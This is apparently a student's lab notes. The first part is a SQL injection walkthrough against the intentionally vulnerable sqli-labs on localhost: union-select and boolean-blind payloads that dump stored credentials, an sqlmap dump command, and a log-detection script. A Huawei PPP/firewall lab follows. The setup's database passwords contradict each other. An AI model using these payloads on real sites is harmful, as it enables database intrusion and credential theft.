Senior Year: Week 17 Practical Training
Environment Setup (Windows)
Windows VM: WIN10_LTSC



phpStudy 2016
Install an older PHP (it must not be newer than 7, otherwise it will not install):
http://public.xp.cn/upgrades/phpStudy20161103.zip

As long as it opens, that is fine.

Copy the lab environment
https://github.com/Audi-1/sqli-labs
Download it as a zip

Copy from here:

Paste it here:

Rename it to: sqli

Fill in a password (the default password is root):

Visit:

Wait a moment

It should look like this:
Environment Setup (Linux)
git clone https://github.com/Audi-1/sqli-labs
docker-compose up
# then browse to port 81

docker-compose.yaml

```yaml
version: '3'
services:
  nginx:
    image: nginx:latest
    ports:
      - "81:80"
    volumes:
      - ./sqli-labs:/var/www/html/sqli
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - php
  php:
    build: .
    volumes:
      - ./sqli-labs:/var/www/html/sqli
  mysql:
    image: mysql:5.7
    environment:
      MYSQL_ROOT_PASSWORD: 123456
    volumes:
      - ./mysql_data:/var/lib/mysql
```

Dockerfile

```dockerfile
FROM php:5.6-fpm-alpine
RUN apk add --no-cache mysql-client
RUN docker-php-ext-install mysql mysqli pdo pdo_mysql
```

nginx.conf

```nginx
server {
    listen 80;
    server_name localhost;
    root /var/www/html;
    index index.php index.html;
    location ~ \.php$ {
        fastcgi_pass php:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}
```

Modify the configuration file

db-creds.inc
Modify the database connection settings in sql-connections/db-creds.inc. The host is the mysql service name from the compose file, and $dbpass must match MYSQL_ROOT_PASSWORD in docker-compose.yaml or the setup page will fail to connect.

```php
<?php
// give your mysql connection username n password
$dbuser = 'root';
$dbpass = 'toor';
$dbname = "security";
$host = 'mysql';
$dbname1 = "challenges";
?>
```

Start
Just forward the port
docker-compose up
As shown in the figure

Open the page in the browser and initialize the database

Initializing:

Lab Task 1: Less-2
1. First test whether a SQL injection vulnerability exists:
http://127.0.0.1/sqli/Less-2/?id=1' (error)

Adding a single quote makes the page throw an error, which indicates a potential injection point.
2. Use an and expression to determine the injection type:
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 (normal)
Next, supply a false expression:
http://127.0.0.1/sqli/Less-2/?id=1 and 1=11 (abnormal)
3. From these results we can conclude that this is a numeric injection (the id is not quoted in the query), and it is injectable.

4. Find the number of columns in the query
http://127.0.0.1/sqli/Less-2/?id=1 order by 10 (abnormal)
Try again:
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 (abnormal)
Try again:
http://127.0.0.1/sqli/Less-2/?id=1 order by 3 (normal)
So the query result contains 3 columns.

5. Find the displayed columns
Use a UNION SELECT statement to see which columns are echoed:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
As the figure shows, columns 2 and 3 are displayed.

6. Find the database name
Now that columns are echoed, the database name can be pulled out:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
Result: security, which confirms the database name.

7. Next, pull out the table names
id=-1 union select 1,2,group_concat(table_name)
from information_schema.tables
where table_schema="security"
Payload:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"
Result: emails,referers,uagents,users (4 tables).

8. Then the column names
id=-1 union select 1,2,group_concat(column_name)
from information_schema.columns
where table_schema="security"
and table_name="users"
Payload:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"
Result: id,username,password (3 columns in total)
9. Data retrieval
Finally, retrieve the sensitive data from the users table:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
This dumps every account and password.
Lab Task 2
The backend query is:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
With id=1'--+ the quote is closed and the rest of the statement is commented out, so the query that runs is:
SELECT * FROM users WHERE id='1'
Less-1: string-type injection (')
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
The single quote has to be closed; then union select injects directly.

Result: usernames and passwords retrieved successfully
Dumb~Dumb, Angelina~I-kill-you, Dummy~p@ssword, secure~crappy, stupid~stupidity, superman~genious, batman~mob!le, admin~admin, admin1~admin1, admin2~admin2, admin3~admin3, admin4~admin4

Less-3: string-type injection (')
Both the single quote and the parenthesis must be closed.
1. Test the injection point
http://127.0.0.1/sqli/Less-3/?id=1')--+
Result: the page renders normally, confirming the closing sequence is correct.
2. Build the full payload to retrieve data
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
Result: same as Less-1, all user data retrieved.
Less-4: string-type injection (")
Both the double quote and the parenthesis must be closed.
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
Result: user data retrieved as before.

Less-5: boolean-based blind injection
Information is extracted step by step through boolean blind injection.
1. Determine the length of the database name
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=9--+
Result: false, the page does not render normally.
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8--+
Result: true, the page renders normally.
Conclusion: the database name is 8 characters long.
2. Determine the database name character by character
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+
Result: true, the page renders normally.
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+
Result: false, the page does not render normally.
Conclusion: the first character of the database name is 's'.
3. Confirm with the ASCII code
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+
Result: true
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+
Result: false
Conclusion: the ASCII code of the first character is 115, the letter 's'.
4. Frequently used ASCII codes
s: 115
e: 101
c: 99
u: 117

5. The remaining work is repetitive, so just use a tool
(though that has no soul).
Dumping tables, columns and values: just use the tool.
Enumerate databases:

Databases obtained:

Enumerate tables

6. No soul: just DUMP it
H:\awd\ONE-FOX集成工具箱_V6公开版_by狐狸\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\sqlmap> python sqlmap.py -u http://127.0.0.1/sqli/Less-5/?id=1 -D security --dump

OK, experiment finished.
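From the defender's side, every probe above leaves a recognisable trail in the web server's access log. The following Python is an added example (not part of sqli-labs or of the original post): it parses combined-format log lines, URL-decodes each query parameter and flags the payload shapes used in these tasks, from the single-quote probe through order by and union select to the substr/ascii comparisons of the blind injection. The log lines are constructed to mirror those requests.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access-log lines (not captured from the lab): the request
# targets reproduce the payload shapes used against sqli-labs above, plus two benign hits.
SAMPLE_LOG = """\
127.0.0.1 - - [02/Jul/2024:10:00:01 +0800] "GET /sqli/Less-2/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [02/Jul/2024:10:00:02 +0800] "GET /sqli/Less-2/?id=1%27 HTTP/1.1" 200 480
127.0.0.1 - - [02/Jul/2024:10:00:03 +0800] "GET /sqli/Less-2/?id=1%20order%20by%203 HTTP/1.1" 200 512
127.0.0.1 - - [02/Jul/2024:10:00:04 +0800] "GET /sqli/Less-2/?id=-1%20union%20select%201,2,database() HTTP/1.1" 200 520
127.0.0.1 - - [02/Jul/2024:10:00:05 +0800] "GET /sqli/Less-2/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22 HTTP/1.1" 200 560
127.0.0.1 - - [02/Jul/2024:10:00:06 +0800] "GET /sqli/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+ HTTP/1.1" 200 470
127.0.0.1 - - [02/Jul/2024:10:00:07 +0800] "GET /sqli/Less-1/?id=42 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures are matched against the URL-decoded parameter value, listed from the
# strongest indicator (data extraction) down to the weakest (a lone quote character).
SIGNATURES = [
    ("union-select", 3, re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("schema-enum", 3, re.compile(r"\binformation_schema\.", re.I)),
    ("boolean-blind", 3, re.compile(r"\b(?:ascii|substr|substring|length)\s*\(", re.I)),
    ("order-by-probe", 2, re.compile(r"\border\s+by\s+\d+", re.I)),
    ("tautology", 2, re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment", 1, re.compile(r"--\s|#|/\*")),
    ("quote", 1, re.compile(r"['\"]")),
]


def classify_value(value):
    """Return the names of the signatures that fire on one decoded parameter value."""
    return [name for name, _, rx in SIGNATURES if rx.search(value)]


def severity(labels):
    """Highest weight among the fired signatures (0 when nothing fired)."""
    weights = {name: weight for name, weight, _ in SIGNATURES}
    return max((weights[label] for label in labels), default=0)


def parse_log_line(line):
    """Split one combined-format line into client, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes and turns '+' into a space, which is exactly how the
    # trailing '--+' in the payloads above becomes a valid MySQL '-- ' comment.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"client": m.group("client"), "path": parts.path,
            "params": params, "status": int(m.group("status"))}


def scan_log(text):
    """One finding per suspicious parameter: (path, name, decoded value, labels, severity)."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            labels = classify_value(value)
            if labels:
                findings.append((rec["path"], name, value, labels, severity(labels)))
    return findings


if __name__ == "__main__":
    for path, name, value, labels, sev in scan_log(SAMPLE_LOG):
        print(f"sev={sev} {path} {name}={value!r} -> {', '.join(labels)}")
```

Signature matching of this kind is a detection aid, not a fix; the lab's code stays injectable until the query is built with bound parameters (mysqli or PDO prepared statements) instead of string interpolation.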
Network Systems Integration Fundamentals (Lab Hours): Lab 8
https://h.dayi.ink/posts/2/#more
Date: 2024-07-02 11:27:12
Lab 8: Campus Network Design, WAN Links and Authentication
Lab contents:
1. WAN link PPP protocol and authentication (PAP and CHAP).
2. Firewall zone configuration.
3. Using the given material, design the Shandong University of Science and Technology campus network (Huangdao campus + Tai'an campus).
Lab report:
Must be completed independently; the report must include the simulator configuration files.
Use the Huawei simulator or the Cisco simulator.
1. WAN link PPP protocol and authentication (PAP and CHAP)
Add the module: 2SA

Connect the routers with a serial cable:

First configure the IP addresses
R1:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24
R2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.2 24
Start capturing first
Start the capture on S4/0/0.
Configure PAP: local authentication
Server side (R2):
aaa
local-user sdkd password cipher kd123456_ovo
local-user sdkd service-type ppp
int s4/0/0
ppp authentication-mode pap
Client side (R1):
int s4/0/0
ppp pap local-user sdkd password simple kd123456_ovo
int s4/0/0
shutdown
undo shutdown
Capture:
Authentication password (visible in the capture):

The link has been established successfully:

Configure CHAP
Remember to start the capture first
The capture is on s4/0/0.
Configure the IP addresses
Same as above
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24
CHAP: configure authentication
Server side: R4
undo info-c enable
aaa
local-user sdkd password cipher 123456_ovo
local-user sdkd service-type ppp
int s4/0/0
link-protocol ppp
ppp authentication-mode chap
ip address 20.1.1.2 255.255.255.0
Client side: R3
undo info-c enable
int s4/0/0
link-protocol ppp
ppp chap user sdkd
ppp chap password cipher 123456_ovo
ip address 20.1.1.1 255.255.255.0
shut
undo shut
Capture the handshake
The Challenge and the Response can be seen
Challenge:

Response:

Configure-Request:

Test the connection
ping 20.1.1.2
ICMP packets carried inside PPP:

2. Firewall zone configuration
Credit: classmate Hu Fang

Configure the IP addresses
Every gateway is .1
- 192.168.10.10/24
- 192.168.0.1/24
- 111.1.1.10/24
- Server: 172.17.2.100/24
- Server: 172.17.2.200/24

Router IP configuration
AR1
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info en
Info: Information center is disabled.
[Huawei]int g0/0/2
[Huawei-GigabitEthernet0/0/2]ip addr 192.168.10.1 24
[Huawei-GigabitEthernet0/0/2]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 192.168.0.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 172.16.1.1 24
AR2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info en
Info: Information center is disabled.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 100.1.1.1 24
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 111.1.1.1 24
[Huawei-GigabitEthernet0/0/1]ping 111.1.1.10
PING 111.1.1.10: 56 data bytes, press CTRL_C to break
Reply from 111.1.1.10: bytes=56 Sequence=1 ttl=128 time=110 ms
Reply from 111.1.1.10: bytes=56 Sequence=2 ttl=128 time=20 ms
Firewall configuration:
sys
undo info en
# DMZ
int G0/0/0
ip address 172.16.2.1 24
# untrust
int G0/0/1
ip address 100.1.1.2 24
# trust
int G0/0/2
ip address 172.16.1.2 24
Step 2: routing configuration
# AR1 configuration
ip route-static 0.0.0.0 0.0.0.0 172.16.1.2
# AR2 configuration
ip route-static 0.0.0.0 0.0.0.0 100.1.1.2
# Firewall configuration
ip route-static 192.168.0.0 255.255.255.0 172.16.1.1
ip route-static 192.168.10.0 255.255.255.0 172.16.1.1
ip route-static 111.1.1.0 255.255.255.0 100.1.1.1
AR1:
AR2:
AR3:
Firewall configuration
# 1. Add the interfaces to their security zones
firewall zone trust
add interface GigabitEthernet0/0/2
firewall zone untrust
add interface GigabitEthernet0/0/1
firewall zone dmz
add interface GigabitEthernet0/0/0
# 2. Configure the interzone policies
policy interzone trust untrust outbound
policy 1
action permit
policy source 192.168.0.0 0.0.0.255
policy 2
action permit
policy source 192.168.10.0 0.0.0.255
policy interzone trust dmz outbound
policy 3
action permit
policy interzone dmz untrust outbound
policy 4
action permit
policy source 172.16.2.0 0.0.0.255
policy interzone dmz untrust inbound
policy 5
action permit
policy source 111.1.1.0 0.0.0.255
# 3. Minor fix (may not be needed): G0/0/0 had landed in trust, so move it to dmz
[SRG-policy-interzone-dmz-untrust-outbound-4]firewall zone dmz
10:34:30 2024/07/02
[SRG-zone-dmz]add interface GigabitEthernet0/0/0
10:34:36 2024/07/02
Info: The interface has been added to trust security zone.
[SRG-zone-dmz]firewall zone trust
10:34:46 2024/07/02
[SRG-zone-trust]undo add int g0/0/0
10:34:51 2024/07/02
[SRG-zone-trust]firewall zone dmz
10:35:02 2024/07/02
[SRG-zone-dmz]add interface GigabitEthernet0/0/0
Verification: check the configuration
[SRG-zone-dmz]dis policy all
10:35:57 2024/07/02
policy zone local
#
policy zone trust
#
policy zone untrust
#
policy zone dmz
#
policy interzone local trust inbound
firewall default packet-filter is permit
#
policy interzone local trust outbound
firewall default packet-filter is permit
#
policy interzone local untrust inbound
firewall default packet-filter is deny
#
policy interzone local untrust outbound
firewall default packet-filter is permit
#
policy interzone local dmz inbound
firewall default packet-filter is deny
#
policy interzone local dmz outbound
firewall default packet-filter is permit
#
policy interzone trust untrust inbound
firewall default packet-filter is deny
#
policy interzone trust untrust outbound
firewall default packet-filter is deny
policy 1 (0 times matched)
action permit
policy service service-set ip
policy source 192.168.0.0 0.0.0.255
policy destination any
policy 2 (0 times matched)
action permit
policy service service-set ip
policy source 192.168.10.0 0.0.0.255
policy destination any
#
policy interzone trust dmz inbound
firewall default packet-filter is deny
#
policy interzone trust dmz outbound
firewall default packet-filter is deny
policy 3 (0 times matched)
action permit
policy service service-set ip
policy source any
policy destination any
#
policy interzone dmz untrust inbound
firewall default packet-filter is deny
policy 5 (0 times matched)
action permit
policy service service-set ip
policy source 111.1.1.0 0.0.0.255
policy destination any
#
policy interzone dmz untrust outbound
firewall default packet-filter is deny
policy 4 (0 times matched)
action permit
policy service service-set ip
policy source 172.16.2.0 0.0.0.255
policy destination any
#
[SRG-zone-dmz]
Test: trust -> untrust, ping succeeds

Test: trust -> DMZ
ping 172.16.1.10 succeeds

Test: untrust -> DMZ
ping 172.16.2.100 succeeds.

Test: DMZ -> untrust
ping succeeds
Test: untrust -> trust
ping fails, as intended: the trust-untrust interzone has no inbound policy, so its default deny applies.
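To make the zone model concrete, here is an added Python model (not part of the lab and not Huawei's software) of how FW1 classifies the first packet of a flow: it maps each address to a zone through the routes configured above, derives the interzone and its direction from the zone priorities in the running-config (outbound runs from the higher-priority zone to the lower one), and applies the five policies with the default packet-filter deny shown by dis policy all. It assumes the source zone can be derived by route lookup (the real firewall uses the ingress interface) and ignores the session table, so only the initiating direction is modelled; the addresses in the checks are the lab's.

```python
import ipaddress

# Zone priorities and interface membership as configured on FW1 above.
ZONE_PRIORITY = {"local": 100, "trust": 85, "dmz": 50, "untrust": 5}
INTERFACE_ZONE = {
    "GigabitEthernet0/0/0": "dmz",
    "GigabitEthernet0/0/1": "untrust",
    "GigabitEthernet0/0/2": "trust",
}

# Connected networks plus the three static routes from the firewall configuration.
ROUTES = [
    ("172.16.2.0/24", "GigabitEthernet0/0/0"),
    ("100.1.1.0/24", "GigabitEthernet0/0/1"),
    ("172.16.1.0/24", "GigabitEthernet0/0/2"),
    ("192.168.0.0/24", "GigabitEthernet0/0/2"),
    ("192.168.10.0/24", "GigabitEthernet0/0/2"),
    ("111.1.1.0/24", "GigabitEthernet0/0/1"),
]

# Interzone policies from the lab, keyed by (higher-priority zone, lower-priority zone,
# direction); each rule is (policy number, action, source network or None for any).
POLICIES = {
    ("trust", "untrust", "outbound"): [(1, "permit", "192.168.0.0/24"),
                                       (2, "permit", "192.168.10.0/24")],
    ("trust", "dmz", "outbound"): [(3, "permit", None)],
    ("dmz", "untrust", "outbound"): [(4, "permit", "172.16.2.0/24")],
    ("dmz", "untrust", "inbound"): [(5, "permit", "111.1.1.0/24")],
}


def egress_interface(ip):
    """Longest-prefix match over ROUTES; raises when the address is unroutable."""
    addr = ipaddress.ip_address(ip)
    best = None
    for prefix, iface in ROUTES:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    if best is None:
        raise LookupError(f"no route to {ip}")
    return best[1]


def zone_of(ip):
    # Simplification: the source zone is also found by route lookup; the firewall
    # really uses the interface the packet arrived on.
    return INTERFACE_ZONE[egress_interface(ip)]


def interzone(src_zone, dst_zone):
    """USG naming: 'outbound' flows from the higher-priority zone to the lower one."""
    if ZONE_PRIORITY[src_zone] > ZONE_PRIORITY[dst_zone]:
        return (src_zone, dst_zone, "outbound")
    return (dst_zone, src_zone, "inbound")


def evaluate(src_ip, dst_ip):
    """Return (action, reason) for the first packet of a new flow between two hosts."""
    src_zone, dst_zone = zone_of(src_ip), zone_of(dst_ip)
    if src_zone == dst_zone:
        return ("permit", f"intra-zone {src_zone}")
    key = interzone(src_zone, dst_zone)
    label = f"interzone {key[0]} {key[1]} {key[2]}"
    for number, action, source in POLICIES.get(key, []):
        if source is None or ipaddress.ip_address(src_ip) in ipaddress.ip_network(source):
            return (action, f"policy {number} in {label}")
    # dis policy all shows 'firewall default packet-filter is deny' for every
    # interzone between trust, dmz and untrust.
    return ("deny", f"default packet-filter deny in {label}")


if __name__ == "__main__":
    # The five ping tests from the lab, with the lab's host addresses.
    for src, dst in [("192.168.10.10", "111.1.1.10"), ("192.168.0.10", "172.16.2.100"),
                     ("111.1.1.10", "172.16.2.100"), ("172.16.2.100", "111.1.1.10"),
                     ("111.1.1.10", "192.168.10.10")]:
        print(f"{src} -> {dst}: {evaluate(src, dst)}")
```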
3. Using the given material, design the Shandong University of Science and Technology campus network (Huangdao campus + Tai'an campus).
The following is already covered in Lab 7:
- IPsec tunnel design (forwarding private traffic over the public network)
- VLAN division
- IP allocation
Configuration files
PAP

R1
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp pap local-user sdkd password simple kd123456_ovo
ip address 20.1.1.1 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
R2
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user sdkd password cipher %$%$aRgKFvmdY5t[EEG6xQgR6Y]{%$%$
local-user sdkd service-type ppp
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp authentication-mode pap
ip address 20.1.1.2 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
CHAP

R3
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp chap user sdkd
ppp chap password cipher %$%$r|/!ZFhr=BZ4PC;fs\|A,.[a%$%$
ip address 20.1.1.1 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
R4
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user sdkd password cipher %$%$K0ne%.\pC$}kUuO2,bo=6i"K%$%$
local-user sdkd service-type ppp
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp authentication-mode chap
ip address 20.1.1.2 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
Firewall

AR1
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 192.168.10.1 255.255.255.0
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 172.16.1.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
AR2
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 100.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 111.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 100.1.1.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
FW1
# CLI_VERSION=V300R001
# Last configuration was changed at 2024/07/02 10:43:58 from console0
#*****BEGIN****public****#
#
stp region-configuration
region-name e05b8d1560bc
active region-configuration
#
interface GigabitEthernet0/0/0
alias GE0/MGMT
ip address 172.16.2.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 100.1.1.2 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 172.16.1.2 255.255.255.0
#
interface GigabitEthernet0/0/3
#
interface GigabitEthernet0/0/4
#
interface GigabitEthernet0/0/5
#
interface GigabitEthernet0/0/6
#
interface GigabitEthernet0/0/7
#
interface GigabitEthernet0/0/8
#
interface NULL0
alias NULL0
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
add interface GigabitEthernet0/0/2
#
firewall zone untrust
set priority 5
add interface GigabitEthernet0/0/1
#
firewall zone dmz
set priority 50
add interface GigabitEthernet0/0/0
#
aaa
local-user admin password cipher %$%$)]`69::R3YFdi.SeqA[<66-$%$%$
local-user admin service-type web terminal telnet
local-user admin level 15
authentication-scheme default
#
authorization-scheme default
#
accounting-scheme default
#
domain default
#
#
nqa-jitter tag-version 1
#
ip route-static 111.1.1.0 255.255.255.0 100.1.1.1
ip route-static 192.168.0.0 255.255.255.0 172.16.1.1
ip route-static 192.168.10.0 255.255.255.0 172.16.1.1
#
banner enable
#
user-interface con 0
authentication-mode none
user-interface vty 0 4
authentication-mode none
protocol inbound all
#
slb
#
right-manager server-group
#
sysname SRG
#
l2tp domain suffix-separator @
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction outbound
firewall packet-filter default permit interzone local untrust direction outbound
firewall packet-filter default permit interzone local dmz direction outbound
#
ip df-unreachables enable
#
firewall ipv6 session link-state check
firewall ipv6 statistic system enable
#
dns resolve
#
firewall statistic system enable
#
pki ocsp response cache refresh interval 0
pki ocsp response cache number 0
#
undo dns proxy
#
license-server domain lic.huawei.com
#
web-manager enable
#
policy interzone trust untrust outbound
policy 1
action permit
policy source 192.168.0.0 0.0.0.255
policy 2
action permit
policy source 192.168.10.0 0.0.0.255
#
policy interzone trust dmz outbound
policy 3
action permit
#
policy interzone dmz untrust inbound
policy 5
action permit
policy source 111.1.1.0 0.0.0.255
#
policy interzone dmz untrust outbound
policy 4
action permit
policy source 172.16.2.0 0.0.0.255
#
return
#-----END----#
0xff: File download

J:\ovo_8>tree /F
卷 新加卷 的文件夹 PATH 列表
卷序列号为 000000F0 5678:35C2
J:.
│ CHAP抓包.pcapng
│ PAP抓包.pcapng
│ 防火墙抓包1.pcapng
│ 防火墙抓包2.pcapng
│ 防火墙抓包3.pcapng
│
├─CHAP
│ │ r3.cfg
│ │ r4.cfg
│ │
│ └─chap
│ │ chap.topo
│ │
│ ├─904055DB-1C22-4e4c-AB05-6EBF512F02F
│ │ vrpcfg.zip
│ │
│ ├─90F0680A-37F0-4b02-B8DD-BB8267B411C
│ │ vrpcfg.zip
│ │
│ ├─97A89D3E-A69F-46ae-B21E-650ECB146AE
│ │ vrpcfg.zip
│ │
│ └─F7B890C7-DFF3-4e91-B891-5A93B8AAF64
│ vrpcfg.zip
│
├─PAP
│ │ R1.cfg
│ │ R2.cfg
│ │
│ └─PAP
│ │ PAP.topo
│ │
│ ├─97A89D3E-A69F-46ae-B21E-650ECB146AE
│ │ vrpcfg.zip
│ │
│ └─F7B890C7-DFF3-4e91-B891-5A93B8AAF64
│ vrpcfg.zip
│
└─防火墙
│ AR1.cfg
│ AR2.cfg
│ FW1.cfg
│
└─防火墙
│ 防火墙.topo
│
├─0220F2E4-47A2-486c-AD46-0D4769CE219
│ vrpcfg.zip
│
├─1AF76E92-D68A-4057-965D-3B6452594CE
│ PC.xml
│
├─6AE4406A-7116-4c99-972C-A2880B823B5
│ vrpcfg.zip
│
├─85DAA1A7-7D9C-4867-963B-C77C20308B0
│ flash.efz
│
├─86D4A863-1037-4f1b-9FFA-6F180DD7CFE
